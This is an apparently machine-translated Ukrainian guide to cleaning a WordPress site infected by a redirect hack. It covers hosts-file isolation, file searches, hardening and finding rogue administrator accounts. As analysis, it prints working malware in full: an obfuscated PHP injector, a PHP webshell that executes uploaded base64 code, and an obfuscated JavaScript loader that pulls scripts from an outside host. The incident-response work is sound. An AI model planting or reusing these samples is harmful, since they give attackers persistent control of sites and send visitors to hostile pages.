Fix Redirect WordPress Hack 2023 (Вірус перенаправлення)

WordPress це безперечно найбільш використовувана платформа CMS (Content Management System) як для блогів, так і для початкових інтернет-магазинів (з модулем WooCommerce), що робить його найбільш уразливим для комп’ютерних атак (зломів). Однією з найбільш використовуваних хакерських операцій є перенаправлення скомпрометованого веб-сайту на інші веб-сторінки. Redirect WordPress Hack 2023 — це відносно нове зловмисне програмне забезпечення, яке перенаправляє весь сайт на веб-сторінки зі спамом або, у свою чергу, може заразити комп’ютери користувачів.

Якщо ваш сайт розроблений на WordPress перенаправляється на інший сайт, то він, швидше за все, є жертвою вже відомого злому перенаправлення.

У цьому підручнику ви знайдете необхідну інформацію та корисні поради, за допомогою яких можна девірусувати веб-сайт, заражений перенаправленням WordPress Hack (Virus Redirect). Через коментарі ви можете отримати додаткову інформацію або звернутися за допомогою.

Купріни

Виявлення вірусу, який перенаправляє сайти WordPress

Раптове і невиправдане зниження відвідуваності веб-сайту, зменшення кількості замовлень (у випадку інтернет-магазинів) або доходів від реклами є першими ознаками того, що щось не так. Виявлення "Redirect WordPress Hack 2023” (Вірусне переспрямування) також можна виконати “візуально”, коли ви відкриваєте веб-сайт і перенаправляєтеся на іншу веб-сторінку.

Як показує досвід, більшість шкідливих веб-програм сумісні з веб-браузерами: Chrome, Firefox, Edge, Opera. Якщо ви користувач комп’ютера Mac, ці віруси насправді не видно у браузері Safari. Система безпеки від Safari тихо блокувати ці шкідливі сценарії.

Що робити, якщо ваш сайт заражений Redirect WordPress Hack

Я сподіваюся, що першим кроком буде не паніка чи видалення веб-сайту. Навіть інфіковані або вірусні файли не слід спочатку видаляти. Вони містять цінну інформацію, яка може допомогти вам зрозуміти, де є порушення безпеки та що вплинуло на вірус. Образ дії.

Закрити веб-сайт для загального доступу.

Як закрити вірусний сайт для відвідувачів? Найпростіший — скористатися диспетчером DNS і видалити IP-адресу для «A» (ім’я домену) або визначити неіснуючу IP-адресу. Таким чином відвідувачі сайту будуть захищені від цього redirect WordPress hack які можуть привести їх до веб-сторінок із вірусами чи СПАМом.

Якщо ви використовуєте CloudFlare як менеджер DNS, ви входите в обліковий запис і видаляєте записи DNS "A” для доменного імені. Таким чином, домен, уражений вірусом, залишиться без IP-адреси, і більше не матиме доступу з Інтернету.

Ви копіюєте IP-адресу веб-сайту та "направляєте" її так, щоб лише ви мали доступ до неї. З комп'ютера.

Як змінити реальний IP веб-сайту на комп'ютерах Windows?

Цей метод часто використовується для блокування доступу до певних веб-сайтів шляхом редагування файлу «hosts».

1. Ви відкриваєте Notepad або інший текстовий редактор (з правами administrator) і відредагуйте файл "hosts". Він розташований у:

C:\Windows\System32\drivers\etc\hosts

2. У файлі «hosts» додайте «route» до справжньої IP-адреси вашого сайту. IP-адресу видалено вище з менеджера DNS.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Збережіть файл і перейдіть на сайт у браузері.

Якщо веб-сайт не відкривається і ви не зробили нічого поганого у файлі «hosts», швидше за все, це кеш DNS.

Щоб очистити кеш DNS в операційній системі Windows, ВІДЧИНЕНО Command Prompt, де ви виконуєте команду:

ipconfig /flushdns

Як змінити реальний IP веб-сайту на комп'ютерах Mac / Macкнига?

Для користувачів комп'ютера Mac дещо простіше змінити реальну IP-адресу веб-сайту.

1. Відкрийте утиліту Terminal.

2. Запустіть командний рядок (для запуску потрібен системний пароль):

sudo nano /etc/hosts

3. Так само, як і для комп’ютерів Windows, додайте справжній IP домену.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Збережіть зміни. Ctrl+X (y).

Після «маршрутизації» ви єдина особа, яка може отримати доступ до зараженого веб-сайту Redirect WordPress Hack.

Повне резервне копіювання веб-сайту – файли та база даних

Навіть якщо він заражений "redirect WordPress hack», рекомендується зробити загальну резервну копію всього веб-сайту. Файли та база даних. Можливо, ви також можете зберегти локальну копію обох файлів з public / public_html а також база даних.

Ідентифікація заражених файлів і файлів, змінених Redirect WordPress Hack 2023

Основні цільові файли WordPress маються index.php (в корені), header.php, index.php şi footer.php теми WordPress активів. Вручну перевірте ці файли та визначте зловмисний код або сценарій шкідливого ПЗ.

У 2023 році вірус “Redirect WordPress Hack” ввести index.php код форми:

(Я не рекомендую запускати ці коди!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Розшифровано, це шкідливий скрипт в основному це наслідок зараження веб-сайту WordPress. Це не сценарій, що стоїть за зловмисним програмним забезпеченням, це сценарій, який дозволяє переспрямовувати заражену веб-сторінку. Якщо ми декодуємо сценарій вище, ми отримаємо:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Щоб ідентифікувати всі файли на сервері, які містять цей код, добре мати доступ SSH на сервер для запуску перевірки файлів і командних рядків керування Linux.

За темою: Як дізнатися, заражений ваш блог чи ні, за допомогою Google Search . (WordPress Вірус)

Нижче наведено дві команди, які, безумовно, допоможуть визначити нещодавно змінені файли та файли, які містять певний код (рядок).

Як ви бачите на Linux PHP-файли змінено протягом останніх 24 годин чи іншого періоду часу?

Замовлення “find” дуже простий у використанні та дозволяє налаштувати період часу, шлях, за яким виконується пошук, і тип файлів.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

У вихідних даних ви отримаєте інформацію про дату та час зміни файлу, права на запис/читання/виконання (chmod) і до якої групи/користувача він належить.

Якщо ви хочете перевірити більше днів тому, змініть значення "-mtime -1» або використовуйте «-mmin -360» протягом хвилин (6 годин).

Як шукати код (рядок) у файлах PHP, Java?

Командний рядок «знайти», який дозволяє швидко знайти всі файли PHP або Java, які містять певний код, виглядає так:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Команда шукатиме та відображатиме файли .php şi .js містить "uJjBRODYsU».

За допомогою двох наведених вище команд ви легко дізнаєтеся, які файли були нещодавно змінені, а які містять шкідливий код.

Видаляє шкідливий код зі змінених файлів без шкоди для правильного коду. У моєму сценарії зловмисне програмне забезпечення було розміщено перед відкриттям <head>.

Під час виконання першої команди «знайти» дуже ймовірно виявити на сервері нові файли, які не є вашими WordPress і не поставити туди вами. Файли, що належать до типу вірусу Redirect WordPress Hack.

У сценарії, який я досліджував, файли форми "wp-log-nOXdgD.php". Це файли «відродження», які також містять шкідливий код, який використовує вірус для перенаправлення.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Призначення файлів типу "wp-log-*” поширює вірус злому перенаправлення на інші веб-сайти, розміщені на сервері. Це шкідливий код типу «webshell” складається з a основний розділ (у якому визначено деякі зашифровані змінні) і o розділ виконання за допомогою якого зловмисник намагається завантажити та виконати шкідливий код у системі.

Якщо є змінна POST названий 'bh' та його зашифроване значення MD5 дорівнює "8f1f964a4b4d8d1ac3f0386693d28d03», тоді з’являється сценарій для запису зашифрованого вмісту base64 іншої змінної під назвою 'b3' у тимчасовий файл, а потім намагається включити цей тимчасовий файл.

Якщо є змінна POST або GET названий 'tick', сценарій відповість значенням MD5 рядка "885».

Щоб ідентифікувати всі файли на сервері, які містять цей код, виберіть загальний рядок, а потім виконайте команду «find” (схожий на наведений вище). Видаліть усі файли, що містять цей шкідливий код.

Використовується недолік безпеки Redirect WordPress Hack

Швидше за все, цей вірус перенаправлення надходить через використання користувача адміністратора WordPress або ідентифікуючи a вразливий плагін що дозволяє додавати користувачів з привілеями administrator.

Для більшості веб-сайтів, створених на платформі WordPress можливо редагування файлів теми або плагіназ інтерфейсу адміністрування (Dashboard). Таким чином, зловмисник може додати зловмисний код до файлів теми, щоб створити сценарії, показані вище.

Приклад такого шкідливого коду:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript визначені в заголовку теми WordPress, одразу після відкриття етикетки <head>.

Досить важко розшифрувати цей JavaScript, але очевидно, що він запитує іншу веб-адресу, звідки, швидше за все, отримує інші сценарії для створення файлів "wp-log-*», про який я говорив вище.

Знайдіть і видаліть цей код з усіх файлів PHP постраждали.

Наскільки я міг судити, цей код був додано вручну новим користувачем з правами адміністратора.

Отже, щоб запобігти додаванню зловмисного програмного забезпечення з інформаційної панелі, найкраще вимкнути опцію редагування WordPress Теми / плагіни з інформаційної панелі.

Відредагуйте файл wp-config.php і додайте рядки:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Після внесення цієї зміни жоден користувач WordPress ви більше не зможете редагувати файли з інформаційної панелі.

Перевірити користувачів з роллю Administrator

Нижче наведено SQL-запит, який можна використовувати для пошуку користувачів із роллю administrator в платформі WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Цей запит поверне всіх користувачів у таблиці wp_users якому відведена роль administrator. Запит також виконується для таблиці wp_usermeta шукати в мета'wp_capabilities', який містить інформацію про ролі користувачів.

Інший спосіб полягає в тому, щоб ідентифікувати їх за: Dashboard → Users → All Users → Administrator. Однак існують способи, за допомогою яких користувача можна приховати на панелі приладів. Отже, найкращий спосіб побачити користувачів "Administrator"в WordPress це команда SQL вище.

У моєму випадку я визначив у базі даних користувача з іменем "wp-import-user". Досить натякає.

Зловмисне програмне забезпечення WP Bad User

Також звідси ви можете побачити дату та час, коли користувач WordPress було створено. Ідентифікатор користувача також дуже важливий, оскільки він шукає журнали сервера. Таким чином ви можете бачити всю активність цього користувача.

Видалити користувачів із роллю administrator чого ти не знаєш, тоді змінити паролі для всіх адміністративних користувачів. Редактор, автор, Administrator.

Змініть пароль користувача бази даних SQL ураженого веб-сайту.

Після виконання цих кроків веб-сайт можна перезапустити для всіх користувачів.

Однак майте на увазі, що те, що я представив вище, є одним із, можливо, тисячі сценаріїв, у яких веб-сайт заражається Redirect WordPress Hack у 2023 році.

Якщо ваш веб-сайт був заражений і вам потрібна допомога або у вас виникли запитання, відкритий розділ коментарів.